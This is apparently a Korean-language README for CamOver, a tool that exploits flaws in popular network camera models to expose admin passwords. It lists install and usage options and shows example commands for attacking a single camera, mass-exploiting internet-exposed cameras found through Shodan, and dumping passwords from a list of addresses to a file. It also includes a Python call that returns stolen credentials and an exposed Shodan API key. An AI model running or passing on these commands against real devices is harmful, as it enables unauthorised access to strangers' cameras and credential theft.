
CamOver는 네트워크 카메라 관리자 비밀번호를 노출할 수 있는 카메라 익스플로잇 도구입니다.
CamOver는 네트워크 카메라의 관리자 비밀번호를 노출할 수 있는 카메라 익스플로잇 도구입니다.
CCTV, GoAhead, Netwave 등 가장 인기 있는 카메라 모델의 취약점을 악용합니다.pip3 install git+https://github.com/EntySec/CamOver
CamOver를 사용하려면 터미널에 camover를 입력하세요.
usage: camover [-h] [-t] [-o OUTPUT] [-i INPUT] [-a ADDRESS] [--shodan SHODAN]
[--zoomeye ZOOMEYE] [-p PAGES]
CamOver는 네트워크 카메라의 관리자 비밀번호를 노출할 수 있는 카메라 익스플로잇 도구입니다.
선택적 인수:
-h, --help 도움말 메시지를 표시하고 종료합니다.
-t, --threads 가장 빠른 작업을 위해 스레드를 사용합니다.
-o OUTPUT, --output OUTPUT
결과를 파일에 출력합니다.
-i INPUT, --input INPUT
주소 입력 파일입니다.
-a ADDRESS, --address ADDRESS
단일 주소입니다.
--shodan SHODAN 인터넷을 통해 장치를 악용하기 위한 Shodan API 키입니다.
--zoomeye ZOOMEYE 인터넷을 통해 장치를 악용하기 위한 ZoomEye API 키입니다.
-p PAGES, --pages PAGES
ZoomEye에서 가져올 페이지 수입니다.
단일 카메라 악용
재미로 내 카메라를 해킹해 봅시다.
camover -a 192.168.99.100
인터넷에서 카메라 악용
Shodan 검색 엔진을 사용하여 인터넷을 통해 카메라를 악용해 보겠습니다. 빠른 악용을 위해 -t를 함께 사용합니다.
camover -t --shodan PSKINdQe1GyxGgecYz2191H2JoS9qvgD
참고: 제공된 Shodan API 키(PSKINdQe1GyxGgecYz2191H2JoS9qvgD)는 제 PRO API 키입니다. 이 키나 자신의 키를 사용할 수 있으며, 모든 리소스를 무료로 자유롭게 사용하세요 :)
입력 파일에서 카메라 악용
빠른 악용을 위해 -t와 함께 열린 카메라 데이터베이스를 사용해 보겠습니다.
camover -t -i cameras.txt -o passwords.txt
참고: cameras.txt 목록에 있는 모든 카메라를 해당 주소를 통해 악용하고 얻은 모든 비밀번호를 passwords.txt에 저장합니다.
CamOver는 자체 Python API도 제공하며, 코드에서 CamOver를 임포트하여 호출할 수 있습니다.
from camover import CamOver
지정된 카메라를 악용하는 데 사용할 수 있는 모든 CamOver 기본 함수입니다.
exploit(address) - 주어진 주소로 단일 카메라를 악용합니다.단일 카메라 악용
from camover import CamOver
camover = CamOver()
creds = camover.exploit('192.168.99.100')
print(creds)